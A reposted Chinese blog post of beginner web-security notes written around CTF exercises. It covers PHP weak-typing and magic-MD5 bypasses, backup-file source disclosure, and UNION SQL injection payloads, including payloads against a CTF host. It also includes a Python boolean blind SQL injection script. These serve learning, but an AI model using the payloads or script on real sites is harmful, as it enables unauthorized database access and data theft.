web安全基础学习笔记

news2024/11/24 3:42:25

这里写目录标题

  • 1.使用hackbar
  • 2.php漏洞基本分析 弱类型语言
    • 2.2 php漏洞找到隐藏的源代码之 index.php~
    • 2.3 php漏洞找到隐藏的源代码之 vim的临时文件 /.index.php.swp
    • 3.php漏洞基本分析 数组
  • 3.php漏洞基本分析 extract
  • 4.php漏洞基本分析 strpos eregi函数漏洞
  • 4.php漏洞基本分析 eregi函数漏洞
  • 5.SQL注入漏洞分析
    • 5.1 整数型 联合注入
      • 5.1.1 判断注入点
      • 5.1.2 判断列数
      • 5.1.3 查询库名
      • 5.1.4 查询表名
      • 5.1.4 查询数据库列名
      • 5.1.4 查询结果
    • 5.1 字符型 联合注入
    • 5.3 布尔盲注
      • 盲注常用函数
      • 编写布尔盲注脚本
  • 6 SQL注入实操
  • 7 PHP反序列化漏洞分析与实操讲解
  • 8 文件上传漏洞

1.使用hackbar

通过hackbar在浏览器发送请求包就能得到请求内容。
在这里插入图片描述

2.php漏洞基本分析 弱类型语言

在这里插入图片描述
如果字符串跟数字匹配会自动转换成数字。
在这里插入图片描述
案例
在这里插入图片描述

2.2 php漏洞找到隐藏的源代码之 index.php~

index.php是一个用PHP语言开发的网站的首页,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx(基本上首页都不会把index.xxxx显示在url里,但也不绝对) 使用index.php~下载到源代码
在这里插入图片描述
下载到源文件后发现代码需要输入两个相同的md5进行判断才给通过。所以这道题可以用0e开头的md5进行绕过。

处理hash字符串时,PHP会将每一个以 0E开头的哈希值解释为0,那么只要传入的不同字符串经过哈希以后是以 0E开头的,那么PHP会认为它们相同

下面是一些哈希后0E开头的字符

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
240610708 
0e462097431906509019562988736854
314282422 
0e990995504821699494520356953734
571579406 
0e972379832854295224118025748221
903251147 
0e174510503823932942361353209384
1110242161 
0e435874558488625891324861198103
1320830526 
0e912095958985483346995414060832
1586264293 
0e622743671155995737639662718498
2302756269 
0e250566888497473798724426794462
2427435592 
0e067696952328669732475498472343
2653531602 
0e877487522341544758028810610885
3293867441 
0e471001201303602543921144570260
3295421201 
0e703870333002232681239618856220
3465814713 
0e258631645650999664521705537122
3524854780 
0e507419062489887827087815735195
3908336290 
0e807624498959190415881248245271
4011627063 
0e485805687034439905938362701775
4775635065 
0e998212089946640967599450361168
4790555361 
0e643442214660994430134492464512
5432453531 
0e512318699085881630861890526097
5579679820 
0e877622011730221803461740184915
5585393579 
0e664357355382305805992765337023
6376552501 
0e165886706997482187870215578015
7124129977 
0e500007361044747804682122060876
7197546197 
0e915188576072469101457315675502
7656486157 
0e451569119711843337267091732412
QLTHNDT 
0e405967825401955372549139051580
QNKCDZO 
0e830400451993494058024219903391
EEIZDOI 
0e782601363539291779881938479162
TUFEPMC 
0e839407194569345277863905212547
UTIPEZQ 
0e382098788231234954670291303879
UYXFLOI 
0e552539585246568817348686838809
IHKFRNS 
0e256160682445802696926137988570
PJNPDWY 
0e291529052894702774557631701704
ABJIHVY 
0e755264355178451322893275696586
DQWRASX 
0e742373665639232907775599582643
DYAXWCA 
0e424759758842488633464374063001
GEGHBXL 
0e248776895502908863709684713578
GGHMVOE 
0e362766013028313274586933780773
GZECLQZ 
0e537612333747236407713628225676
NWWKITQ 
0e763082070976038347657360817689
NOOPCJF 
0e818888003657176127862245791911
MAUXXQC 
0e478478466848439040434801845361
MMHUWUV 
0e701732711630150438129209816536

2.3 php漏洞找到隐藏的源代码之 vim的临时文件 /.index.php.swp

用户在使用vim编辑,意外退出时,会在当前目录生成备份文件

以 index.php 为例 第一次产生的缓存文件名为 .index.php.swp
第二次意外退出后,文件名为.index.php.swo
第三次产生的缓存文件则为 .index.php.swn
注意:index前有 " . "
在这里插入图片描述

3.php漏洞基本分析 数组

在这里插入图片描述
题目要求输入的v3必须跟flag的一致才能给你返回。
php的某些函数是不能输入数组的,如果强行输入数组会返回一个null,而在php中对null中取非他就是True.

只要看到一个只能接收字符串的输入,就往里面灌入一个其他类型的函数,可能会有意想不到的结果。

这道题也是一样只要注入一个不同的数组就能得到结果。

/?v1[]=1&v2[]=2&v3[]=3 直接灌入数组

在这里插入图片描述

3.php漏洞基本分析 extract

extract 把数组转换成变量名和变量值的生命。
在这里插入图片描述

该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

这道题可以通过强行传入数组或者传入空值来解决。

/extract.php/?aurora&flage 直接不写内容就是空

4.php漏洞基本分析 strpos eregi函数漏洞

案例
在这里插入图片描述
这道题可以用数组绕过。

4.php漏洞基本分析 eregi函数漏洞

eregi函数在进行匹配的时候,如果碰到%00会意味着字符串的结束,因此我们只需要传入%001234,他截取到%00后匹配的时候就会变成111,111在1114中,成功绕过

案例 https://blog.csdn.net/m0_52432374/article/details/113647955?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-113647955-blog-124258277.235^v43^control&spm=1001.2101.3001.4242.1&utm_relevant_index=3

5.SQL注入漏洞分析

只要通过让他的语句结果为真就可以进行注入,找到注入点让他的结果不一样
在这里插入图片描述

5.1 整数型 联合注入

5.1.1 判断注入点

条件1 回显结果到网页
在这里插入图片描述
案例页面 输入的结果可以显示到网页中。
在这里插入图片描述
他的注入点就在输入的地方。在原来数据查询的基础上增加一个条件,同时要求他这个条件成立。

/1.php?id=2 and 1=0 通过在注入点后面增加sql语句就可以发现原始的sql有没有拼接我们新加进去的语句。如果加进去了就证明注入点可用。

5.1.2 判断列数

通过拼接order by来猜测数据有多少列,因为超过后会直接报错。

?id=2 order by 4

5.1.3 查询库名

通过拼接 union 来查询数据库名

/1.php?id=0 union select 1,2,database()

在这里插入图片描述

5.1.4 查询表名

在这里插入图片描述

通过之前查询出来的数据库,查询这个库里面的全部表
/1.php?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where%20table_schema= ‘ctf’

5.1.4 查询数据库列名

/1.php?id=0 UNION SELECT 1,2,group_concat(COLUMN_NAME) FROM information_schema.columns WHERE table_name = ‘answer’

在这里插入图片描述

5.1.4 查询结果

/1.php?id=0 UNION select 1,2,flag from answer

在这里插入图片描述

5.1 字符型 联合注入

把内容加成了字符型,如果使用之前的1=1的方式会被带成一个整体带入请求里面也就是字符串。
在这里插入图片描述
解决方案
在这里插入图片描述
跟之前的方式一样,不过要添加一个闭合引号以及注释引号
在这里插入图片描述
步骤还是跟之前的一样就是添加了几个引号
在这里插入图片描述

5.3 布尔盲注

没有结果的回显。
在这里插入图片描述
解决办法
在这里插入图片描述
案例

在这里插入图片描述
通过sql语句的返回真假 去猜测这个数据库的长度。
在这里插入图片描述

盲注常用函数

在这里插入图片描述
通过这些语句猜测数据库里面的库和表名,暴力破解的方式进行猜测。

编写布尔盲注脚本

使用盲注脚本进行暴力破解

# 导入requests发送请求,导入re正则表达式对响应包进行筛选
import re
import requests


# 首先测试一下是否能够正常访问到测试地址
url = "http://test.com"
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
# DBname = ''
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
                 '(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
response = requests.get(url_template,headers = headers)
print(response)


def GetDBName():
    # 获取数据库的长度
    print("----------测试数据库长度--------------")
    url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
    for i in range(1, 99):
        current_url = url_template.format(i)
        response = requests.get(current_url, headers=headers)
        if re.search(r'You are in',response.text):
            len = i
            print("数据库长度为:", i)
            break

    # 测试数据库名称
    print("----------测试数据库名--------------")
    DBname = ''
    url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"
    for i in range(1, len+1):
        for j in range(33, 127):
            # 拼接构造需要的测试的URL地址,通过format函数批量构造
            current_url1 = url_template1.format(i, j)
#            print(current_url1)

            # 发送请求
            response1 = requests.get(current_url1, headers=headers)

            # 判断是否成功
            if re.search(r'You are in', response1.text):
                DBname += chr(j)
                print("数据库名为:", DBname)
                break

if __name__ == '__main__':
    GetDBName()



6 SQL注入实操

找到列数后查询库名。

/?r=content&cid=0%27%20union%20select%201,2,3,4,5,6,7,8,9,10,database(),12,13%23
在这里插入图片描述

在查询他的表名

http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0' union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13 from information_schema.tables where 
 table_schema='cuni'%23

在这里插入图片描述
列名查询数

http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,group_concat(COLUMN_NAME),12,13%20FROM%20information_schema.columns%20WHERE%20table_name%20=%20%27adword%27%23union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13%20from%20information_schema.tables%20where%20table_schema=%27cuni%27%23

在这里插入图片描述

查询数据库内容

http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0' UNION select 1,2,3,4,5,6,7,8,9,10,date,12,13 from content %23

在这里插入图片描述

7 PHP反序列化漏洞分析与实操讲解

在这里插入图片描述
在这里插入图片描述

序列号只能序列化属性,不序列化方法在这里插入图片描述

在这里插入图片描述
样例
在这里插入图片描述
魔术方法介绍:https://blog.csdn.net/weixin_45954730/article/details/131861020在这里插入图片描述

8 文件上传漏洞

在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1798245.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

docker学习--最详细的docker run 各子命令解释与应用

文章目录 docker run应用docker run -it那怎样才能退出容器而不用容器关闭呢 docker run -d-p-P--name docker run 容器运行命令 docker run 常见的子命令及其含义 -i 交互式,和-t一起使用 -t 打开一个终端 -d 后台运行 -p/-P 暴露容器中的服务端口 –name 指定容…

如何备份和恢复华为手机?

智能手机已成为我们日常生活中不可或缺的一部分,它们存储着大量敏感数据。因此,确保数据安全,定期备份至关重要,以防手机意外丢失、损坏或被盗。 如果您拥有华为设备,并且正在寻找如何将华为手机备份到PC的方法&#…

接口签名和postman预处理生成签名

nestjs后端代码 controller Get(md5hmacSHA1b64)postMd5hmacSHA1b64(Req() request: Request, Query() query) {// 获取GET请求参数const queryParamsMap new Map(Object.entries(query));return this.handleMd5hmacSHA1b64(queryParamsMap, request);}Post(md5hmacSHA1b64)U…

【Redis】解决 Redis 运行在 Protected Mode 下的 DENIED 错误:消除 Redis 受保护模式的完美方案

【Redis】解决 Redis 运行在 Protected Mode 下的 DENIED 错误:消除 Redis 受保护模式的完美方案 大家好 我是寸铁👊 总结了一篇【Redis】解决 Redis 运行在 Protected Mode 下的 DENIED 错误:消除 Redis 受保护模式的完美方案✨ 喜欢的小伙伴…

RAG 查询检索模块 - 检索 - Pinecone 混合检索方案

虽然向量检索有助于检索给定查询的语义相关块,但它有时在匹配特定关键字词方面缺乏准确性。 为了解决这个问题,混合检索是一种解决方案。该策略充分利用了矢量搜索和关键字搜索等不同检索技术的优势,并将它们智能地组合在一起。使用这种混合…

Linux驱动开发笔记(四)设备树进阶及GPIO、Pinctrl子系统

文章目录 前言一、设备树的进阶知识1. 追加/修改节点内容2.chosen子节点3. 获取设备树节点信息3.1 of_find_node_by_path( )函数3.2 of_find_node_by_name( )函数3.3 of_find_node_by_type( )函数3.4 of_find_compatible_node( )函数3.5 of_find_matching_node_and_match( )函数…

如何将照片从Android传输到笔记本电脑?

目前全球大部分照片都是由手机拍摄的。唯一的问题是这些照片会占用您的内部存储或 SD 卡上的大量空间。如果您的Android设备存储空间不足,您可能会被迫将照片从Android手机传输到笔记本电脑。您访问此网站只是因为您想了解如何将图片从Android传输到笔记本电脑。 如…

Ubuntu24.04开发环境配置

目录 0. 前言1. 宇宙最强编辑器(暂定)vscode的安装与配置1.1 下载安装1.2 用户配置和常用插件 2. C/C环境配置3. git配置4. MySQL配置5. Java环境配置 0. 前言 本篇博客主要介绍Ubuntu24.04中的开发环境等配置。 1. 宇宙最强编辑器(暂定&am…

在大模型AI的下一个战场,为中小创新企业重构竞争格局

麦肯锡预计到2030年前,AI有望为全球经济贡献25.6万亿美元的价值,其中生成式AI的贡献高达7.6万亿美元。自2023年“百模大战”以来,基础大模型的“战事”已经进入尾声,大模型正在“卷向”产业和行业,越来越多的创新企业正…

【每日刷题】Day58

【每日刷题】Day58 🥕个人主页:开敲🍉 🔥所属专栏:每日刷题🍍 🌼文章目录🌼​​​​​​​ 1. 3038. 相同分数的最大操作数目 I - 力扣(LeetCode) 2. 868. …

24年北京网安大会是AI驱动安全?还是驱动安全股票全员下跌?

AI驱动安全,网安一哥疯狂转发 吉祥学安全知识星球🔗除了包含技术干货:Java代码审计、web安全、应急响应等,还包含了安全中常见的售前护网案例、售前方案、ppt等,同时也有面向学生的网络安全面试、护网面试等。 2024年6…

Vue --关于传递参数

多参数传递的两种方法: 第一种:params方法(此方法传递不会在URL路径中显示拼接) 传递参数: this.$router.push({name: "home",params:{key:1} })接收参数: created() {// 获取参数console.log…

whistle手机抓包

环境:whistle:2.9.59 whistle手机抓包(ios可以抓小程序的包;安卓机不能抓小程序的包,但是小程序的有开发者工具就够用了) 以安卓手机为例(手机跟电脑要连同一个wifi) 1.电脑安装w…

香港优才计划线上申请10大步骤,2024年流程截图,diy照做就可以

我是糖爸,已获批香港优才。10个步骤申请香港优才真的很简单,因为现在入境处只接受线上申请啦,你自己上传资料就可以,找中介也是你自己准备资料给他帮忙上传,何不自己动手上传呢,省个几万。 10大步骤分别是&…

2024年【起重机司机(限桥式起重机)】考试试卷及起重机司机(限桥式起重机)证考试

题库来源:安全生产模拟考试一点通公众号小程序 2024年【起重机司机(限桥式起重机)】考试试卷及起重机司机(限桥式起重机)证考试,包含起重机司机(限桥式起重机)考试试卷答案和解析及起重机司机(限桥式起重机)证考试练习。安全生产模拟考试一点通结合国家…

fastadmin按钮级别权限控制实现

1.菜单规则得存在。 2.html代码增加对应控制 3.js代码增加对应路由标志 <div class"panel panel-default panel-intro"><div class"panel-heading">{:build_heading(null,FALSE)}<ul class"nav nav-tabs" data-field"sta…

numpy入门笔记

学习参考&#xff1a; 菜鸟教程 numpy入门博客 numpy入门视频 NumPy安装 默认情况使用国外线路&#xff0c;国外太慢&#xff0c;我们使用清华的镜像 pip3 install numpy scipy matplotlib -i https://pypi.tuna.tsinghua.edu.cn/simple一、创建数组 numpy.array(object, dt…

【K8s】专题四(7):Kubernetes 控制器之 CronJob

以下内容均来自个人笔记并重新梳理&#xff0c;如有错误欢迎指正&#xff01;如果对您有帮助&#xff0c;烦请点赞、关注、转发&#xff01;欢迎扫码关注个人公众号&#xff01; 目录 一、基本介绍 二、工作原理 三、相关特性 四、资源清单&#xff08;示例&#xff09; 五…

一图文看懂oracle数据库的安装与卸载

oracle数据库安装与卸载 1、卸载 对于已经安装过oracle数据库的主机&#xff0c;一般卸载起来比较麻烦&#xff0c;需要卸载大致四个地方&#xff0c;分别是关闭应用的服务、删除相关注册表、删除路径以及删除安装的位置&#xff0c;最后就需要重启主机。 前提&#xff0c;在…

从零开始:如何在直播应用中集成美颜SDK和美颜插件

本篇文章&#xff0c;小编将详细介绍如何从零开始&#xff0c;在直播应用中集成美颜SDK和美颜插件。 一、准备工作 确定需求 在开始集成美颜SDK之前&#xff0c;首先需要明确需求。考虑以下几个问题&#xff1a; 直播应用的目标用户是谁&#xff1f; 需要集成哪些美颜功能&…